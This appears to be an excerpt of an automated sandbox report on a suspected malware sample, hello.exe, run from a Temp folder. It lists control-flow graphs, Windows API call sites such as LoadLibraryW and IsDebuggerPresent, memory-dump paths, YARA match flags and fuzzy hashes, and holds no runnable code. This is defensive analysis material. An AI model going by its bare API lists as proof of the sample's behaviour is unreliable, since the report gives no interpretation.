                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 312133B1C006199BCB10DF9AD845B9EFBF8FB48710F10812AD919A7340D778AA40CFE5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1798 16664d8-166652a 1800 1666532-166655d LoadLibraryW 1798->1800 1801 166652c-166652f 1798->1801 1802 1666566-1666583 1800->1802 1803 166655f-1666565 1800->1803 1801->1800 1803->1802
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 01666550
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2674040094.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_1660000_hello.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                          • Opcode ID: 8c8c7bd1f33a1f95317755dd7b7e7aa9a9cba06834a2af1cca10cbd269516cef
                                                                                                                                                                                                                                          • Instruction ID: 80763c95dff3174ab2ed7363360273550d512cd041fdebf0d33df700e3c5650c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c8c7bd1f33a1f95317755dd7b7e7aa9a9cba06834a2af1cca10cbd269516cef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 481142B5C006598BCB14CFAAD94579EFBF8BF48310F10812AD819B3344D778AA40CFA0

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1806 1665dbc-16668dc FindCloseChangeNotification 1809 16668e5-166690d 1806->1809 1810 16668de-16668e4 1806->1810 1810->1809
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 016668CF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2674040094.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_1660000_hello.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2591292051-0
                                                                                                                                                                                                                                          • Opcode ID: 2dcbf603f7072bf4d2049cd8f49141637e16baff2a09badc2017467aa64a95ae
                                                                                                                                                                                                                                          • Instruction ID: 3d5e9d6272f1cea3201c31c6ac09cee8f7365b39aa94292a0ac61c682b82ea59
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2dcbf603f7072bf4d2049cd8f49141637e16baff2a09badc2017467aa64a95ae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F01116B18006498FCB20DFAAD4457AEBBF8EF48320F118469D518A7341D779A944CBA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 1813 1666868-16668a9 1814 16668b1-16668dc FindCloseChangeNotification 1813->1814 1815 16668e5-166690d 1814->1815 1816 16668de-16668e4 1814->1816 1816->1815
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000), ref: 016668CF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2674040094.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_1660000_hello.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2591292051-0
                                                                                                                                                                                                                                          • Opcode ID: 08c4d7f806ba873ab6bc6667b138c46166b138b7ef38c38049c8514fbb076721
                                                                                                                                                                                                                                          • Instruction ID: 4791564ba0cd8324941788c24ee9945cd4d17b56e9a06c08ab5afea420fa26a2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08c4d7f806ba873ab6bc6667b138c46166b138b7ef38c38049c8514fbb076721
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A71155B58003898FCB10CFA9D5457EEBFF4AF48320F24846AD958A7241C778A984CFA5
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6C3901E6
                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6C3902B2
                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C3902CB
                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6C3902D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                                                          • Opcode ID: fb3743d30dd38ce8dd69ccbc61155bd8c693b5bbfd290eda8c850254d1c8f49d
                                                                                                                                                                                                                                          • Instruction ID: 1af7b2cdb2c89f98ecded45f3163efb9f2682be2d508496bc301eb380004b86f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb3743d30dd38ce8dd69ccbc61155bd8c693b5bbfd290eda8c850254d1c8f49d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 453106B5D45258DBDF20EFA4D9497CDBBB8AF08304F1041AAE54CAB240FB719A85CF45
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, Offset: 6C3A3000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                                                                          • Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                                          • Instruction ID: d01424c1a44ccb6be08720877a68f51d05632c4a47ae7b566839842eb923dadd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C471D4B5411B00EBD7631B32DD41AD976A27F2570CF504914A1DE3AE30DF3268699EE2
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 6C391D29
                                                                                                                                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6C391E37
                                                                                                                                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 6C391F89
                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 6C391FA4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                          • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                          • Opcode ID: c681d2fe6f19e90e4fc3e00e417c3777ba5fbc71c4905b1a3e9f8a40d0392314
                                                                                                                                                                                                                                          • Instruction ID: 2aa3b73d544c3b55428f0f8f66f8b103dff15a5ebb21190867cc050e3418eb53
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c681d2fe6f19e90e4fc3e00e417c3777ba5fbc71c4905b1a3e9f8a40d0392314
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AB1BA71D00209DFDF05CFA5C9809AEBBB9FF04318B14426AE8527BA55E336DA51CF92
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6C390CE7
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C390CEF
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6C390D78
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C390DA3
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 6C390DF8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                          • Opcode ID: 08162d8c5c4c708e50775f87af11d6d473aa145066924cecd36411c111c5d6c3
                                                                                                                                                                                                                                          • Instruction ID: faf343bcfc31e80c3e53950307033a139b28fd503d1f3e394bf9e27d61710424
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08162d8c5c4c708e50775f87af11d6d473aa145066924cecd36411c111c5d6c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A41B334A01258EBCF00DF68C880ADEBBB9AF4931CF148155E8146B7A1E736EA05CFD1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,9D037332,?,6C396254,6C392DF5,6C394209,00000000), ref: 6C396206
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                          • Opcode ID: ed5c626231122b94650395d8d1b5780e706081551758fa22e8a5d7e5d1b57191
                                                                                                                                                                                                                                          • Instruction ID: 7ebe940011907c4170e6437ab6271f1fff8ce5ce6e8b63412047c3d04fc6633a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed5c626231122b94650395d8d1b5780e706081551758fa22e8a5d7e5d1b57191
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C221EB31B06511A7DB51AF25AC80A8E377CEF423A8F250215ED15E7782F736EA00CEE1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,?,6C390E91,6C38FFB0,6C38F9C9,?,6C38FC01,?,00000001,?,?,00000001,?,6C3A1698,0000000C,6C38FCFA), ref: 6C39126A
                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C391278
                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C391291
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6C38FC01,?,00000001,?,?,00000001,?,6C3A1698,0000000C,6C38FCFA,?,00000001,?), ref: 6C3912E3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                          • Opcode ID: 3e3ad5eea6a7763e78e515faf0a115b24e332ee93368dd417587ab4364f62ddc
                                                                                                                                                                                                                                          • Instruction ID: 54a6f14a734e01403babf33ff0d32a8e1861c883d78df05fcdd905c31a3592dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e3ad5eea6a7763e78e515faf0a115b24e332ee93368dd417587ab4364f62ddc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8301D87630D3155EEA5126B5ACC458A367CEB0377D7200329E550E5AE0FF53DC049E52
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\1000202001\hello.exe, xrefs: 6C395395
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\1000202001\hello.exe
                                                                                                                                                                                                                                          • API String ID: 0-2451236103
                                                                                                                                                                                                                                          • Opcode ID: 2fedab92fa7968fc3880cb7ec56fa6a67ea24359303f81121b343e9113f80f74
                                                                                                                                                                                                                                          • Instruction ID: a1b8803bf23ec84f495ca97e66ab20f47116d85e89334c262073b8e00f8f6f72
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fedab92fa7968fc3880cb7ec56fa6a67ea24359303f81121b343e9113f80f74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0621A471204205AFDB509F65C88099A77BDBF5136FB848714F894D7A50F732DC909FA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 6C3BC77F
                                                                                                                                                                                                                                            • Part of subcall function 6C3BBA5C: __getptd_noexit.LIBCMT ref: 6C3BBA5F
                                                                                                                                                                                                                                            • Part of subcall function 6C3BBA5C: __amsg_exit.LIBCMT ref: 6C3BBA6C
                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 6C3BC79F
                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 6C3BC7AF
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 6C3BC7DF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, Offset: 6C3A3000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                          • String ID: 0EB
                                                                                                                                                                                                                                          • API String ID: 3170801528-3472271230
                                                                                                                                                                                                                                          • Opcode ID: e238d488bc79b5e864176e3efb4f77429685bdb8fab3dde3f4d5a3452374dae3
                                                                                                                                                                                                                                          • Instruction ID: d87613bfa0bfe5086dc3cfe17f647b8c82f7ecdaf9d9b19ec03350dadf19cd84
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e238d488bc79b5e864176e3efb4f77429685bdb8fab3dde3f4d5a3452374dae3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD01A132A41725DFD720AF65A885789B760BF2471CF104115E460B7E90DB349986CFDA
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9D037332,?,?,00000000,6C39BB32,000000FF,?,6C39328A,00000002,?,6C39325E,6C393CCE), ref: 6C393325
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C393337
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,6C39BB32,000000FF,?,6C39328A,00000002,?,6C39325E,6C393CCE), ref: 6C393359
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 7fb616978879bea88de93cf7a986822313aa61dcbc129fe424522078991c6da2
                                                                                                                                                                                                                                          • Instruction ID: 326befb9a98265d6efcf31eadcafc20c0063d7c1b4fa4239da02c0282a786251
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fb616978879bea88de93cf7a986822313aa61dcbc129fe424522078991c6da2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD016272A44519EFDF129F90CC09BEE7BBCFB05719F000625E925A2790EB7A9900CE90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 6C397F99
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 6C398062
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 6C3980C9
                                                                                                                                                                                                                                            • Part of subcall function 6C396FA5: HeapAlloc.KERNEL32(00000000,6C3958F2,4D88C033,?,6C3958F2,00000220,?,6C3940B9,4D88C033), ref: 6C396FD7
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 6C3980DC
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 6C3980E9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679579048.000000006C381000.00000020.00000001.01000000.00000014.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679534619.000000006C380000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679676632.000000006C39C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1096550386-0
                                                                                                                                                                                                                                          • Opcode ID: 6be99b87435c3498b6e587f1de50f4b48c4c86ec3f852b4da88cee3359117dcc
                                                                                                                                                                                                                                          • Instruction ID: e676f716be5f6ef0394491558067c9b7589e1e5fcec5b6045fdbe0b92725f312
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6be99b87435c3498b6e587f1de50f4b48c4c86ec3f852b4da88cee3359117dcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A351CF72605206BBEB104F649C80EEB36A9DF85718F21412AFD55EAB40FB32D854CE62
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 6C3BC4E3
                                                                                                                                                                                                                                            • Part of subcall function 6C3BBA5C: __getptd_noexit.LIBCMT ref: 6C3BBA5F
                                                                                                                                                                                                                                            • Part of subcall function 6C3BBA5C: __amsg_exit.LIBCMT ref: 6C3BBA6C
                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 6C3BC4FA
                                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 6C3BC508
                                                                                                                                                                                                                                          • __lock.LIBCMT ref: 6C3BC518
                                                                                                                                                                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 6C3BC52C
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, Offset: 6C3A3000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679887973.000000006C3CD000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_18_2_6c380000_hello.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 938513278-0
                                                                                                                                                                                                                                          • Opcode ID: dda3cb636e12ca779e0afb16fe6277575db58770a14d18d93bb8717fb2b8ea00
                                                                                                                                                                                                                                          • Instruction ID: a5959792a7b2a779411f4f1aef4221e63fe9fc4a8d3578649d1be8bdb29d429a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dda3cb636e12ca779e0afb16fe6277575db58770a14d18d93bb8717fb2b8ea00
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF09632A40310DBD631BB76AA4179D77A0AF1072DF20421BD094BAFD0CFB456458E5B
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, Offset: 6C3A3000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000012.00000002.2679727829.000000006C3CB000.00000004.00000001.01000000.00000014.sdmpDownload File
